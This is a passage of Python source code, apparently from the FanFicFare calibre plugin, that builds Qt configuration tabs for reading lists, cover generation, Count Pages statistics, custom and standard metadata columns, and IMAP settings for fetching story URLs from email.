        self.addtolists.setChecked(prefs['addtolists'])
        self.l.addWidget(self.addtolists)
        horz = QHBoxLayout()
        label = QLabel(_('"Send to Device" Reading Lists'))
        label.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
        horz.addWidget(label)
        self.send_lists_box = EditWithComplete(self)
        self.send_lists_box.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
        self.send_lists_box.update_items_cache(reading_lists)
        self.send_lists_box.setText(prefs['send_lists'])
        horz.addWidget(self.send_lists_box)
        self.send_lists_box.setCursorPosition(0)
        self.l.addLayout(horz)
        # "To Read" list settings.
        self.addtoreadlists = QCheckBox(_('Add new/updated stories to "To Read" Reading List(s).'),self)
        self.addtoreadlists.setToolTip(_('Automatically add new/updated stories to these lists in the %(rl)s plugin.\nAlso offers menu option to remove stories from the "To Read" lists.')%no_trans)
        self.addtoreadlists.setChecked(prefs['addtoreadlists'])
        self.l.addWidget(self.addtoreadlists)
        horz = QHBoxLayout()
        label = QLabel(_('"To Read" Reading Lists'))
        label.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
        horz.addWidget(label)
        self.read_lists_box = EditWithComplete(self)
        self.read_lists_box.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
        self.read_lists_box.update_items_cache(reading_lists)
        self.read_lists_box.setText(prefs['read_lists'])
        horz.addWidget(self.read_lists_box)
        self.read_lists_box.setCursorPosition(0)
        self.l.addLayout(horz)
        self.addtolistsonread = QCheckBox(_('Add stories back to "Send to Device" Reading List(s) when marked "Read".'),self)
        self.addtolistsonread.setToolTip(_('Menu option to remove from "To Read" lists will also add stories back to "Send to Device" Reading List(s)'))
        self.addtolistsonread.setChecked(prefs['addtolistsonread'])
        self.l.addWidget(self.addtolistsonread)
        self.autounnew = QCheckBox(_('Automatically run Remove "New" Chapter Marks when marking books "Read".'),self)
        self.autounnew.setToolTip(_('Menu option to remove from "To Read" lists will also remove "(new)" chapter marks created by personal.ini <i>mark_new_chapters</i> setting.'))
        self.autounnew.setChecked(prefs['autounnew'])
        self.l.addWidget(self.autounnew)
        # Push all widgets to the top of the tab.
        self.l.insertStretch(-1)
class CalibreCoverTab(QWidget):
    '''Config tab controlling where the calibre cover image for a
    downloaded book comes from: the story site (via the EPUB), calibre's
    built-in random cover generator, or the Generate Cover plugin.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        self.gencov_elements=[] ## used to disable/enable when gen
                                ## cover is off/on. This is more
                                ## about being a visual cue than real
                                ## necessary function.
        topl = self.l = QVBoxLayout()
        self.setLayout(self.l)
        # The Generate Cover plugin may not be installed.
        try:
            gc_plugin = plugin_action.gui.iactions['Generate Cover']
            gc_settings = gc_plugin.get_saved_setting_names()
        except KeyError:
            gc_settings= []
        label = QLabel(_("The Calibre cover image for a downloaded book can come"
                         " from the story site(if EPUB and images are enabled), or"
                         " from either Calibre's built-in random cover generator or"
                         " the %(gc)s plugin.")%no_trans)
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        tooltip = _("Update Calibre book cover image from EPUB when Calibre metadata is updated.\n"
                    "Doesn't go looking for new images on 'Update Calibre Metadata Only'.\n"
                    "Cover in EPUB could be from site or previously injected into the EPUB.\n"
                    "This comes before Generate Cover so %(gc)s(Plugin) use the image if configured to.")%no_trans
        horz = QHBoxLayout()
        label = QLabel(_('Update Calibre Cover (from EPUB):'))
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.updatecalcover = QComboBox(self)
        for i in updatecalcover_order:
            self.updatecalcover.addItem(i)
        # back compat. If has own value, use.
        if prefs['updatecalcover']:
            self.updatecalcover.setCurrentIndex(self.updatecalcover.findText(prefs_save_options[prefs['updatecalcover']]))
        elif prefs['updatecover']: # doesn't have own val, set YES if old value set.
            self.updatecalcover.setCurrentIndex(self.updatecalcover.findText(prefs_save_options[SAVE_YES]))
        else: # doesn't have own value, old value not set, NO.
            self.updatecalcover.setCurrentIndex(self.updatecalcover.findText(prefs_save_options[SAVE_NO]))
        self.updatecalcover.setToolTip(tooltip)
        label.setBuddy(self.updatecalcover)
        horz.addWidget(self.updatecalcover)
        self.l.addLayout(horz)
        self.covernewonly = QCheckBox(_("Set Calibre Cover Only for New Books"),self)
        self.covernewonly.setToolTip(_("Set the Calibre cover from EPUB only for new\nbooks, not updates to existing books."))
        self.covernewonly.setChecked(prefs['covernewonly'])
        horz = QHBoxLayout()
        horz.addItem(QtGui.QSpacerItem(20, 1))
        horz.addWidget(self.covernewonly)
        self.l.addLayout(horz)
        self.l.addSpacing(5)
        tooltip = _("Generate a Calibre book cover image when Calibre metadata is updated.<br />"
                    "Note that %(gc)s(Plugin) will only run if there is a %(gc)s setting configured below for Default or the appropriate site.")%no_trans
        horz = QHBoxLayout()
        label = QLabel(_('Generate Calibre Cover:'))
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.gencalcover = QComboBox(self)
        for i in gencalcover_order:
            self.gencalcover.addItem(i)
        self.gencalcover.setCurrentIndex(self.gencalcover.findText(prefs_save_options[prefs['gencalcover']]))
        self.gencalcover.setToolTip(tooltip)
        label.setBuddy(self.gencalcover)
        horz.addWidget(self.gencalcover)
        self.l.addLayout(horz)
        self.gencalcover.currentIndexChanged.connect(self.endisable_elements)
        horz = QHBoxLayout()
        horz.addItem(QtGui.QSpacerItem(20, 1))
        vert = QVBoxLayout()
        horz.addLayout(vert)
        self.l.addLayout(horz)
        self.gcnewonly = QCheckBox(_("Generate Covers Only for New Books")%no_trans,self)
        self.gcnewonly.setToolTip(_("Default is to generate a cover any time the calibre metadata is"
                                    " updated.<br />Used for both Calibre and Plugin generated covers."))
        self.gcnewonly.setChecked(prefs['gcnewonly'])
        vert.addWidget(self.gcnewonly)
        self.gencov_elements.append(self.gcnewonly)
        self.gc_polish_cover = QCheckBox(_("Inject/update the generated cover inside EPUB"),self)
        self.gc_polish_cover.setToolTip(_("Calibre's Polish feature will be used to inject or update the generated"
                                          " cover into the EPUB ebook file.<br />Used for both Calibre and Plugin generated covers."))
        self.gc_polish_cover.setChecked(prefs['gc_polish_cover'])
        vert.addWidget(self.gc_polish_cover)
        self.gencov_elements.append(self.gc_polish_cover)
        # can't be local or it's destroyed when __init__ is done and
        # connected things don't fire.
        self.gencov_rdgrp = QButtonGroup()
        self.gencov_gb = QGroupBox()
        horz = QHBoxLayout()
        self.gencov_gb.setLayout(horz)
        self.plugin_gen_cover = QRadioButton(_('Plugin %(gc)s')%no_trans,self)
        ## BUGFIX: the %no_trans substitution used to be applied
        ## *inside* the _() call, which defeated translation lookup for
        ## this tooltip; apply it to the translated string instead,
        ## matching every other use in this file.
        self.plugin_gen_cover.setToolTip(_("Use the %(gc)s plugin to create covers.<br>"
                                           "Requires that you have the the %(gc)s plugin installed.<br>"
                                           "Additional settings are below.")%no_trans)
        self.gencov_rdgrp.addButton(self.plugin_gen_cover)
        # always, new only, when no cover from site, inject yes/no...
        self.plugin_gen_cover.setChecked(prefs['plugin_gen_cover'])
        horz.addWidget(self.plugin_gen_cover)
        self.gencov_elements.append(self.plugin_gen_cover)
        self.calibre_gen_cover = QRadioButton(_('Calibre Generate Cover'),self)
        self.calibre_gen_cover.setToolTip(_("Call Calibre's Edit Metadata Generate cover"
                                            " feature to create a random cover each time"
                                            " a story is downloaded or updated.<br />"
                                            "Right click or long click the 'Generate cover'"
                                            " button in Calibre's Edit Metadata to customize."))
        self.gencov_rdgrp.addButton(self.calibre_gen_cover)
        # always, new only, when no cover from site, inject yes/no...
        self.calibre_gen_cover.setChecked(prefs['calibre_gen_cover'])
        horz.addWidget(self.calibre_gen_cover)
        self.gencov_elements.append(self.calibre_gen_cover)
        #self.l.addLayout(horz)
        self.l.addWidget(self.gencov_gb)
        self.gcp_gb = QGroupBox(_("%(gc)s(Plugin) Settings")%no_trans)
        topl.addWidget(self.gcp_gb)
        # Everything added to self.l below goes inside the Generate
        # Cover plugin group box.
        self.l = QVBoxLayout()
        self.gcp_gb.setLayout(self.l)
        self.gencov_elements.append(self.gcp_gb)
        self.gencov_rdgrp.buttonClicked.connect(self.endisable_elements)
        label = QLabel(_('The %(gc)s plugin can create cover images for books using various metadata (including existing cover image). If you have %(gc)s installed, FanFicFare can run %(gc)s on new downloads and metadata updates. Pick a %(gc)s setting by site and/or one to use by Default.')%no_trans)
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        scrollable = QScrollArea()
        scrollcontent = QWidget()
        scrollable.setWidget(scrollcontent)
        scrollable.setWidgetResizable(True)
        self.l.addWidget(scrollable)
        self.sl = QVBoxLayout()
        scrollcontent.setLayout(self.sl)
        # One dropdown per site (plus 'Default') choosing which
        # Generate Cover setting to run for that site's stories.
        self.gc_dropdowns = {}
        sitelist = getSiteSections()
        sitelist.sort()
        sitelist.insert(0,_("Default"))
        for site in sitelist:
            horz = QHBoxLayout()
            label = QLabel(site)
            if site == _("Default"):
                s = _("On Metadata update, run %(gc)s with this setting, if there isn't a more specific setting below.")%no_trans
            else:
                no_trans['site']=site # not ideal, but, meh.
                s = _("On Metadata update, run %(gc)s with this setting for %(site)s stories.")%no_trans
            label.setToolTip(s)
            horz.addWidget(label)
            dropdown = QComboBox(self)
            dropdown.setToolTip(s)
            dropdown.addItem('','none')
            for setting in gc_settings:
                dropdown.addItem(setting,setting)
            if site == _("Default"):
                # prefs are stored under the untranslated key 'Default'.
                self.gc_dropdowns["Default"] = dropdown
                if 'Default' in prefs['gc_site_settings']:
                    dropdown.setCurrentIndex(dropdown.findData(prefs['gc_site_settings']['Default']))
            else:
                self.gc_dropdowns[site] = dropdown
                if site in prefs['gc_site_settings']:
                    dropdown.setCurrentIndex(dropdown.findData(prefs['gc_site_settings'][site]))
            horz.addWidget(dropdown)
            self.sl.addLayout(horz)
        self.sl.insertStretch(-1)
        self.allow_gc_from_ini = QCheckBox(_('Allow %(gcset)s from %(pini)s to override')%no_trans,self)
        self.allow_gc_from_ini.setToolTip(_("The %(pini)s parameter %(gcset)s allows you to choose a %(gc)s setting based on metadata"
                                            " rather than site, but it's much more complex.<br />%(gcset)s is ignored when this is off.")%no_trans)
        self.allow_gc_from_ini.setChecked(prefs['allow_gc_from_ini'])
        self.l.addWidget(self.allow_gc_from_ini)
        # keep at end.
        self.endisable_elements()
    def endisable_elements(self,button=None):
        '''Clearing house function for setting elements of Calibre
        Cover tab enabled/disabled depending on all factors.'''
        ## BUGFIX: this used to be two adjacent string *statements*, so
        ## the second line was a no-op expression rather than part of
        ## the docstring; merged into a single docstring.
        ## First, cover gen on/off
        for e in self.gencov_elements:
            e.setEnabled(prefs_save_options[unicode(self.gencalcover.currentText())] != SAVE_NO)
        # next, disable plugin settings when using calibre gen cov.
        if not self.plugin_gen_cover.isChecked():
            self.gcp_gb.setEnabled(False)
        # disable (but not enable) unsupported options.
        if not HAS_CALGC:
            self.calibre_gen_cover.setEnabled(False)
        if not 'Generate Cover' in self.plugin_action.gui.iactions:
            self.plugin_gen_cover.setEnabled(False)
            self.gcp_gb.setEnabled(False)
class CountPagesTab(QWidget):
    '''Config tab for integration with the Count Pages plugin: choose
    which statistics Count Pages should update when stories are added
    or updated.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        self.l = QVBoxLayout()
        self.setLayout(self.l)
        label = QLabel(_('These settings provide integration with the %(cp)s Plugin. %(cp)s can automatically update custom columns with page, word and reading level statistics. You have to create and configure the columns in %(cp)s first.')%no_trans)
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        label = QLabel(_('If any of the settings below are checked, when stories are added or updated, the %(cp)s Plugin will be called to update the checked statistics.')%no_trans)
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        # the same for all settings. Mostly.
        tooltip = _('Which column and algorithm to use are configured in %(cp)s.')%no_trans
        # 'PageCount', 'WordCount', 'FleschReading', 'FleschGrade', 'GunningFog'
        self.pagecount = QCheckBox('Page Count',self)
        self.pagecount.setToolTip(tooltip)
        self.pagecount.setChecked('PageCount' in prefs['countpagesstats'])
        self.l.addWidget(self.pagecount)
        horz = QHBoxLayout()
        self.wordcount = QCheckBox('Word Count',self)
        self.wordcount.setToolTip(tooltip+"\n"+_('Will overwrite word count from FanFicFare metadata if set to update the same custom column.'))
        self.wordcount.setChecked('WordCount' in prefs['countpagesstats'])
        horz.addWidget(self.wordcount)
        self.wordcountmissing = QCheckBox('Only if Word Count is Missing in FanFicFare Metadata',self)
        self.wordcountmissing.setToolTip(_("Only run Count Page's Word Count if checked <i>and</i> FanFicFare metadata doesn't already have a word count. If this is used with one of the other Page Counts, the Page Count plugin will be called twice."))
        self.wordcountmissing.setChecked(prefs['wordcountmissing'])
        self.wordcountmissing.setEnabled(self.wordcount.isChecked())
        horz.addWidget(self.wordcountmissing)
        # The 'missing only' option is meaningful only while the Word
        # Count checkbox is on, so track its state.
        self.wordcount.stateChanged.connect(lambda x : self.wordcountmissing.setEnabled(self.wordcount.isChecked()))
        self.l.addLayout(horz)
        self.fleschreading = QCheckBox('Flesch Reading Ease',self)
        self.fleschreading.setToolTip(tooltip)
        self.fleschreading.setChecked('FleschReading' in prefs['countpagesstats'])
        self.l.addWidget(self.fleschreading)
        self.fleschgrade = QCheckBox('Flesch-Kincaid Grade Level',self)
        self.fleschgrade.setToolTip(tooltip)
        self.fleschgrade.setChecked('FleschGrade' in prefs['countpagesstats'])
        self.l.addWidget(self.fleschgrade)
        self.gunningfog = QCheckBox('Gunning Fog Index',self)
        self.gunningfog.setToolTip(tooltip)
        self.gunningfog.setChecked('GunningFog' in prefs['countpagesstats'])
        self.l.addWidget(self.gunningfog)
        # Push all widgets to the top of the tab.
        self.l.insertStretch(-1)
class OtherTab(QWidget):
    '''Convenience tab: keyboard shortcut editor, reset of suppressed
    confirmation dialogs, and a viewer for the plugin's stored library
    preferences.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        self.l = QVBoxLayout()
        self.setLayout(self.l)
        label = QLabel(_("These controls aren't plugin settings as such, but convenience buttons for setting Keyboard shortcuts and getting all the FanFicFare confirmation dialogs back again."))
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        keyboard_shortcuts_button = QPushButton(_('Keyboard shortcuts...'), self)
        keyboard_shortcuts_button.setToolTip(_('Edit the keyboard shortcuts associated with this plugin'))
        keyboard_shortcuts_button.clicked.connect(parent_dialog.edit_shortcuts)
        self.l.addWidget(keyboard_shortcuts_button)
        reset_confirmation_button = QPushButton(_('Reset disabled &confirmation dialogs'), self)
        reset_confirmation_button.setToolTip(_('Reset all show me again dialogs for the FanFicFare plugin'))
        reset_confirmation_button.clicked.connect(self.reset_dialogs)
        self.l.addWidget(reset_confirmation_button)
        view_prefs_button = QPushButton(_('&View library preferences...'), self)
        view_prefs_button.setToolTip(_('View data stored in the library database for this plugin'))
        view_prefs_button.clicked.connect(self.view_prefs)
        self.l.addWidget(view_prefs_button)
        self.l.insertStretch(-1)
    def reset_dialogs(self):
        '''Re-enable every 'show me again' dialog this plugin disabled.'''
        # Suppressed-dialog flags live in calibre's `dynamic` store
        # under an 'fff_' prefix; False means 'don't show again'.
        for key in dynamic.keys():
            if key.startswith('fff_') and dynamic[key] is False:
                dynamic[key] = True
        info_dialog(self, _('Done'),
                    _('Confirmation dialogs have all been reset'),
                    show=True,
                    show_copy_button=False)
    def view_prefs(self):
        '''Show the plugin's stored preferences for the current library.'''
        d = PrefsViewerDialog(self.plugin_action.gui, PREFS_NAMESPACE)
        d.exec_()
# Maps calibre custom-column datatypes to the FanFicFare metadata
# entries that are allowed to populate a column of that type.
permitted_values = {
    'int' : ['numWords','numChapters'],
    'float' : ['numWords','numChapters'],
    'bool' : ['status-C','status-I'],
    'datetime' : ['datePublished', 'dateUpdated', 'dateCreated'],
    'series' : ['series'],
    'enumeration' : ['category',
                     'genre',
                     'language',
                     'series',
                     'characters',
                     'ships',
                     'status',
                     'datePublished',
                     'dateUpdated',
                     'dateCreated',
                     'rating',
                     'warnings',
                     'numChapters',
                     'numWords',
                     'site',
                     'publisher',
                     'storyId',
                     'authorId',
                     'extratags',
                     'title',
                     'storyUrl',
                     'description',
                     'author',
                     'authorUrl',
                     'formatname',
                     'version'
                     #,'formatext' # not useful information.
                     #,'siteabbrev'
                     ]
    }
# no point copying the whole list.
# 'text' and 'comments' columns accept the same entries as enumeration.
permitted_values['text'] = permitted_values['enumeration']
permitted_values['comments'] = permitted_values['enumeration']
# Human-readable (translated) display labels for each FanFicFare
# metadata entry, used in the custom-column dropdowns.
titleLabels = {
    'category':_('Category'),
    'genre':_('Genre'),
    'language':_('Language'),
    'status':_('Status'),
    'status-C':_('Status:%(cmplt)s')%no_trans,
    'status-I':_('Status:%(inprog)s')%no_trans,
    'series':_('Series'),
    'characters':_('Characters'),
    'ships':_('Relationships'),
    'datePublished':_('Published'),
    'dateUpdated':_('Updated'),
    'dateCreated':_('Created'),
    'rating':_('Rating'),
    'warnings':_('Warnings'),
    'numChapters':_('Chapters'),
    'numWords':_('Words'),
    'site':_('Site'),
    'publisher':_('Publisher'),
    'storyId':_('Story ID'),
    'authorId':_('Author ID'),
    'extratags':_('Extra Tags'),
    'title':_('Title'),
    'storyUrl':_('Story URL'),
    'description':_('Description'),
    'author':_('Author'),
    'authorUrl':_('Author URL'),
    'formatname':_('File Format'),
    'formatext':_('File Extension'),
    'siteabbrev':_('Site Abbrev'),
    'version':_('FanFicFare Version')
    }
class CustomColumnsTab(QWidget):
    '''Config tab mapping FanFicFare metadata entries onto the user's
    calibre custom columns, plus the special error, saved-metadata and
    last-checked columns.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        ## sort by visible Column Name (vs #name)
        custom_columns = sorted(self.plugin_action.gui.library_view.model().custom_columns.items(), key=lambda x: x[1]['name'])
        self.l = QVBoxLayout()
        self.setLayout(self.l)
        label = QLabel(_("If you have custom columns defined, they will be listed below. Choose a metadata value type to fill your columns automatically."))
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        self.custcol_dropdowns = {}
        self.custcol_newonlycheck = {}
        scrollable = QScrollArea()
        scrollcontent = QWidget()
        scrollable.setWidget(scrollcontent)
        scrollable.setWidgetResizable(True)
        self.l.addWidget(scrollable)
        self.sl = QVBoxLayout()
        scrollcontent.setLayout(self.sl)
        # One row per custom column of a supported datatype: a metadata
        # dropdown plus a 'New Only' checkbox.
        for key, column in custom_columns:
            if column['datatype'] in permitted_values:
                horz = QHBoxLayout()
                label = QLabel('%s(%s)'%(column['name'],key))
                label.setToolTip(_("Update this %s column(%s) with...")%(key,column['datatype']))
                horz.addWidget(label)
                dropdown = QComboBox(self)
                dropdown.addItem('','none')
                for md in permitted_values[column['datatype']]:
                    dropdown.addItem(titleLabels[md],md)
                self.custcol_dropdowns[key] = dropdown
                if key in prefs['custom_cols']:
                    dropdown.setCurrentIndex(dropdown.findData(prefs['custom_cols'][key]))
                if column['datatype'] == 'enumeration':
                    dropdown.setToolTip(_("Metadata values valid for this type of column.")+"\n"+_("Values that aren't valid for this enumeration column will be ignored."))
                else:
                    dropdown.setToolTip(_("Metadata values valid for this type of column."))
                horz.addWidget(dropdown)
                newonlycheck = QCheckBox(_("New Only"),self)
                newonlycheck.setToolTip(_("Write to %s(%s) only for new\nbooks, not updates to existing books.")%(column['name'],key))
                self.custcol_newonlycheck[key] = newonlycheck
                if key in prefs['custom_cols_newonly']:
                    newonlycheck.setChecked(prefs['custom_cols_newonly'][key])
                horz.addWidget(newonlycheck)
                self.sl.addLayout(horz)
        self.sl.insertStretch(-1)
        self.l.addSpacing(5)
        self.allow_custcol_from_ini = QCheckBox(_('Allow %(ccset)s from %(pini)s to override')%no_trans,self)
        self.allow_custcol_from_ini.setToolTip(_("The %(pini)s parameter %(ccset)s allows you to set custom columns to site specific values that aren't common to all sites.<br />%(ccset)s is ignored when this is off.")%no_trans)
        self.allow_custcol_from_ini.setChecked(prefs['allow_custcol_from_ini'])
        self.l.addWidget(self.allow_custcol_from_ini)
        label = QLabel(_("Special column:"))
        label.setWordWrap(True)
        self.l.addWidget(label)
        # Error column: records the reason when update/overwrite fails.
        horz = QHBoxLayout()
        label = QLabel(_("Update/Overwrite Error Column:"))
        tooltip=_("When an update or overwrite of an existing story fails, record the reason in this column.\n(Text and Long Text columns only.)")
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.errorcol = QComboBox(self)
        self.errorcol.setToolTip(tooltip)
        self.errorcol.addItem('','none')
        for key, column in custom_columns:
            if column['datatype'] in ('text','comments'):
                self.errorcol.addItem(column['name'],key)
        self.errorcol.setCurrentIndex(self.errorcol.findData(prefs['errorcol']))
        horz.addWidget(self.errorcol)
        self.save_all_errors = QCheckBox(_('Save All Errors'),self)
        self.save_all_errors.setToolTip(_('If unchecked, these errors will not be saved: %s')%(
                '\n'+
                '\n'.join((_("Not Overwriting, web site is not newer."),
                           _("Already contains %d chapters.").replace('%d','X')))))
        self.save_all_errors.setChecked(prefs['save_all_errors'])
        horz.addWidget(self.save_all_errors)
        self.l.addLayout(horz)
        # Saved metadata column: keeps a copy of FanFicFare's metadata.
        horz = QHBoxLayout()
        label = QLabel(_("Saved Metadata Column:"))
        tooltip=_("If set, FanFicFare will save a copy of all its metadata in this column when the book is downloaded or updated.<br/>The metadata from this column can later be used to update custom columns without having to request the metadata from the server again.<br/>(Long Text columns only.)")
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.savemetacol = QComboBox(self)
        self.savemetacol.setToolTip(tooltip)
        self.savemetacol.addItem('','')
        for key, column in custom_columns:
            ## BUGFIX: was `in ('comments')` -- a parenthesized string,
            ## not a tuple, so this performed a *substring* test.  It
            ## happened to work only because no other calibre datatype
            ## is a substring of 'comments'.  Made the intent explicit.
            if column['datatype'] == 'comments':
                self.savemetacol.addItem(column['name'],key)
        self.savemetacol.setCurrentIndex(self.savemetacol.findData(prefs['savemetacol']))
        horz.addWidget(self.savemetacol)
        label = QLabel('')
        horz.addWidget(label) # empty spacer for alignment with error column line.
        self.l.addLayout(horz)
        # Last checked column: datetime of last update/check.
        horz = QHBoxLayout()
        label = QLabel(_("Last Checked Column:"))
        tooltip=_("Record the last time FanFicFare updated or checked for updates.\n(Date columns only.)")
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.lastcheckedcol = QComboBox(self)
        self.lastcheckedcol.setToolTip(tooltip)
        self.lastcheckedcol.addItem('','none')
        ## sort by visible Column Name (vs #name)
        for key, column in custom_columns:
            if column['datatype'] == 'datetime':
                self.lastcheckedcol.addItem(column['name'],key)
        self.lastcheckedcol.setCurrentIndex(self.lastcheckedcol.findData(prefs['lastcheckedcol']))
        horz.addWidget(self.lastcheckedcol)
        label = QLabel('')
        horz.addWidget(label) # empty spacer for alignment with error column line.
        self.l.addLayout(horz)
class StandardColumnsTab(QWidget):
    '''Config tab controlling which standard calibre metadata columns
    FanFicFare fills, and whether each is set only for new books.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        # Standard columns FanFicFare knows how to fill, in display order.
        columns=OrderedDict()
        columns["title"]=_("Title")
        columns["authors"]=_("Author(s)")
        columns["publisher"]=_("Publisher")
        columns["tags"]=_("Tags")
        columns["languages"]=_("Languages")
        columns["pubdate"]=_("Published Date")
        columns["timestamp"]=_("Date")
        columns["comments"]=_("Comments")
        columns["series"]=_("Series")
        columns["identifiers"]=_("Ids(url id only)")
        self.l = QVBoxLayout()
        self.setLayout(self.l)
        label = QLabel(_("The standard calibre metadata columns are listed below. You may choose whether FanFicFare will fill each column automatically on updates or only for new books."))
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        self.stdcol_newonlycheck = {}
        # Build one grid row per column: label, 'New Only' checkbox,
        # plus column-specific extra options for title/authors/series.
        rows=[]
        for key, column in six.iteritems(columns):
            row = []
            rows.append(row)
            label = QLabel(column)
            #label.setToolTip("Update this %s column(%s) with..."%(key,column['datatype']))
            row.append(label)
            newonlycheck = QCheckBox(_("New Only"),self)
            newonlycheck.setToolTip(_("Write to %s only for new\nbooks, not updates to existing books.")%column)
            self.stdcol_newonlycheck[key] = newonlycheck
            if key in prefs['std_cols_newonly']:
                newonlycheck.setChecked(prefs['std_cols_newonly'][key])
            row.append(newonlycheck)
            if key == 'title':
                self.suppresstitlesort = QCheckBox(_('Force Title into Title Sort?'),self)
                self.suppresstitlesort.setToolTip(_("If checked, the title as given will be used for the Title Sort, too.\nIf not checked, calibre will apply it's built in algorithm which makes 'The Title' sort as 'Title, The', etc."))
                self.suppresstitlesort.setChecked(prefs['suppresstitlesort'])
                row.append(self.suppresstitlesort)
                self.titlecase = QCheckBox(_('Fix Title Case?'),self)
                self.titlecase.setToolTip(_("If checked, Calibre's routine for correcting the capitalization of title will be applied.")
                                          +"\n"+_("This effects Calibre metadata only, not FanFicFare metadata in title page."))
                self.titlecase.setChecked(prefs['titlecase'])
                row.append(self.titlecase)
            elif key == 'authors':
                self.set_author_url = QCheckBox(_('Set Calibre Author URL'),self)
                self.set_author_url.setToolTip(_("Set Calibre Author URL to Author's URL on story site."))
                self.set_author_url.setChecked(prefs['set_author_url'])
                row.append(self.set_author_url)
                self.suppressauthorsort = QCheckBox(_('Force Author into Author Sort?'),self)
                self.suppressauthorsort.setToolTip(_("If checked, the author(s) as given will be used for the Author Sort, too.\nIf not checked, calibre will apply it's built in algorithm which makes 'Bob Smith' sort as 'Smith, Bob', etc."))
                self.suppressauthorsort.setChecked(prefs['suppressauthorsort'])
                row.append(self.suppressauthorsort)
                self.authorcase = QCheckBox(_('Fix Author Case?'),self)
                self.authorcase.setToolTip(_("If checked, Calibre's routine for correcting the capitalization of author names will be applied.")
                                           +"\n"+_("Calibre remembers all authors in the library; changing the author case on one book will effect all books by that author.")
                                           +"\n"+_("This effects Calibre metadata only, not FanFicFare metadata in title page."))
                self.authorcase.setChecked(prefs['authorcase'])
                row.append(self.authorcase)
            elif key == 'series':
                self.set_series_url = QCheckBox(_('Set Calibre Series URL'),self)
                self.set_series_url.setToolTip(_("Set Calibre Series URL to Series's URL on story site."))
                self.set_series_url.setChecked(prefs['set_series_url'])
                row.append(self.set_series_url)
                self.setanthologyseries = QCheckBox(_("Set 'Series [0]' for New Anthologies?"),self)
                self.setanthologyseries.setToolTip(_("If checked, the Series column will be set to 'Series Name [0]' when an Anthology for a series is first created."))
                self.setanthologyseries.setChecked(prefs['setanthologyseries'])
                row.append(self.setanthologyseries)
        grid = QGridLayout()
        for rownum, row in enumerate(rows):
            for colnum, col in enumerate(row):
                grid.addWidget(col,rownum,colnum)
        self.l.addLayout(grid)
        self.l.addSpacing(5)
        label = QLabel(_("Other Standard Column Options"))
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        self.includecomments = QCheckBox(_("Include Books' Comments in Anthology Comments?"),self)
        self.includecomments.setToolTip(_('''Include all the merged books' comments in the new book's comments.
Default is a list of included titles only.'''))
        self.includecomments.setChecked(prefs['includecomments'])
        self.l.addWidget(self.includecomments)
        self.anth_comments_newonly = QCheckBox(_("Set Anthology Comments only for new books"),self)
        self.anth_comments_newonly.setToolTip(_("Comments will only be set for New Anthologies, not updates.\nThat way comments you set manually are retained."))
        self.anth_comments_newonly.setChecked(prefs['anth_comments_newonly'])
        self.l.addWidget(self.anth_comments_newonly)
        # Push all widgets to the top of the tab.
        self.l.insertStretch(-1)
class ImapTab(QWidget):
    '''Config tab for fetching story URLs from unread emails in an
    IMAP mailbox.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        self.l = QGridLayout()
        self.setLayout(self.l)
        # `row` tracks the current grid row as widgets are appended.
        row=0
        label = QLabel(_('These settings will allow FanFicFare to fetch story URLs from your email account. It will only look for story URLs in unread emails in the folder specified below.'))
        label.setWordWrap(True)
        self.l.addWidget(label,row,0,1,-1)
        row+=1
        label = QLabel(_('IMAP Server Name'))
        tooltip = _("Name of IMAP server--must allow IMAP4 with SSL. Eg: imap.gmail.com")
        label.setToolTip(tooltip)
        self.l.addWidget(label,row,0)
        self.imapserver = QLineEdit(self)
        self.imapserver.setToolTip(tooltip)
        self.imapserver.setText(prefs['imapserver'])
        self.l.addWidget(self.imapserver,row,1)
        row+=1
        label = QLabel(_('IMAP User Name'))
        tooltip = _("Name of IMAP user. Eg: yourname@gmail.com\nNote that Gmail accounts need to have IMAP enabled in Gmail Settings first.")
        label.setToolTip(tooltip)
        self.l.addWidget(label,row,0)
        self.imapuser = QLineEdit(self)
        self.imapuser.setToolTip(tooltip)
        self.imapuser.setText(prefs['imapuser'])
        self.l.addWidget(self.imapuser,row,1)
        row+=1
        label = QLabel(_('IMAP User Password'))
        tooltip = _("IMAP password. If left empty, FanFicFare will ask you for your password when you use the feature.")
        label.setToolTip(tooltip)
        self.l.addWidget(label,row,0)
        self.imappass = QLineEdit(self)
        self.imappass.setToolTip(tooltip)
        # Mask the password as it is typed.
        self.imappass.setEchoMode(QLineEdit.Password)
        self.imappass.setText(prefs['imappass'])
        self.l.addWidget(self.imappass,row,1)
        row+=1
        self.imapsessionpass = QCheckBox(_('Remember Password for Session (when not saved above)'),self)
        self.imapsessionpass.setToolTip(_('If checked, and no password is entered above, FanFicFare will remember your password until you close calibre or change Libraries.'))
